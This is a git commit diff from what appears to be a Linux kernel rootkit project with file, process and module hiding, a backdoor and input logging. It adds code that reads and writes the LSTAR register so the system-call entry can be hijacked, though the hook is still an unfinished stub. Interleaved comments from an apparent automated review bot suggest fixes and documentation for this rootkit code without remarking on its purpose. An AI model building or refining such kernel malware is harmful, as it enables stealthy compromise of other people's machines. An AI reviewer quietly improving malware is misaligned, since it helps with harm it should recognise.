commit 79c785b8d357fdaf51b42b3f4c5163c3f735dea1
parent b799331bd6b2a52968cfd6de184f46c4e3f862e7
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date: Mon, 4 Jan 2021 16:48:06 +0100
R/W lstar functions
Diffstat:
2 files changed, 39 insertions(+), 3 deletions(-)
diff --git a/src/filehide_lstar.c b/src/filehide_lstar.c
@@ -1,16 +1,35 @@
#include <linux/kernel.h>
+#include <asm/nospec-branch.h>
#include "filehide_lstar.h"
#include "common.h"
static unsigned long read_lstar(void);
+static void write_lstar(unsigned int low, unsigned int high);
+static void hooked_lstar(void);
+
+unsigned long lstar_addr;
void
test_lstar(void)
{
- unsigned long lstar = read_lstar();
+ lstar_addr = read_lstar();
+ DEBUG_INFO("LSTAR before is %0lx\n", lstar_addr);
+
+ unsigned int low = (int)((unsigned long) lstar_addr & 0xFFFFFFFF);
+ unsigned int high = (int)((unsigned long) lstar_addr >> 32);
- DEBUG_INFO("LSTAR is %0lx\n", lstar);
+ // write_lstar((low + 4), high);
+
+ DEBUG_INFO("LSTAR after is %0lx\n", read_lstar());
+}
+
+static void
+hooked_lstar(void)
+{
+ __asm__ volatile (
+ "\tjmp *%0\n"
+ :: "m"(lstar_addr));
}
static unsigned long
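Review bot: The `(int)` casts on the `low`/`high` initializers route an unsigned 64-bit value through a signed intermediate for no reason — `lstar_addr & 0xFFFFFFFF` need not fit in `int`, so that conversion is implementation-defined before it is widened back to `unsigned int`; write `unsigned int low = (unsigned int)(lstar_addr & 0xFFFFFFFFu);` and `unsigned int high = (unsigned int)(lstar_addr >> 32);` (the `(unsigned long)` cast on a variable that already is `unsigned long` is a no-op). With the `write_lstar` call commented out both locals are unused, and `hooked_lstar` has no caller anywhere in this hunk, so the build will warn on both; nothing visible here uses the newly included `asm/nospec-branch.h` either. The `%0lx` in the two `DEBUG_INFO` formats is a zero flag with no field width and has no effect — `%016lx` or `%#lx` is presumably what was meant. `lstar_addr` is a non-static file-scope global; unless the header deliberately exports it, `static unsigned long lstar_addr;` keeps it file-local.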
@@ -26,7 +45,7 @@ read_lstar(void)
: [low] "=r" (low), [high] "=r" (high)
:
: "ecx", "eax", "edx"
- );
+ );
//Get two 32bit values into a 64bit variable
unsigned long ret = high;
@@ -34,4 +53,18 @@ read_lstar(void)
ret |= low;
return ret;
+}
+
+static void
+write_lstar(unsigned int low, unsigned int high)
+{
+ __asm__ volatile (
+ "movl $0xc0000082, %%ecx\n\t" //https://elixir.bootlin.com/linux/v4.19/source/arch/x86/include/asm/msr-index.h#L15
+ "mov %[low], %%eax\n\t"
+ "mov %[high], %%edx\n\t"
+ "wrmsr"
+ :
+ : [low] "r" (low), [high] "r" (high)
+ : "ecx", "eax", "edx"
+ );
}
\ No newline at end of file
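Review bot: `write_lstar` carries no comment stating its contract, and in this commit it is dead code because its only call site in `test_lstar` is commented out. A one-line header such as `/* Loads IA32_LSTAR (MSR 0xc0000082) from its two 32-bit halves via wrmsr; a wrong value takes effect at the next syscall, so the caller must pass a valid entry address. */` would document it. The MSR number is a magic literal justified only by a URL comment, and `read_lstar` (whose body starts outside this hunk) presumably repeats the same literal, so one named constant shared by both would keep them from drifting. The file is also left without a trailing newline.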
diff --git a/src/hook.c b/src/hook.c
@@ -16,6 +16,7 @@
#include "rootkit.h"
#include "modhide.h"
#include "filehide.h"
+#include "filehide_lstar.h"
#include "backdoor.h"
#include "pidhide.h"
#include "openhide.h"
@@ -98,6 +99,8 @@ init_hooks(void)
if (rootkit.logging_input)
log_input("127.0.0.1", "5000");
+
+ test_lstar();
}
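Review bot: `test_lstar()` is called unconditionally from the production init path even though its name marks it as a probe and it returns `void`, so `init_hooks` cannot tell whether it did anything. Either rename it to describe its role in initialisation or give it an `int` return that this call checks, in line with how the rest of `init_hooks` (which starts outside the hunk) appears to gate work on `rootkit.*` flags, e.g. `if (test_lstar() < 0) return;` once it reports failure.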
void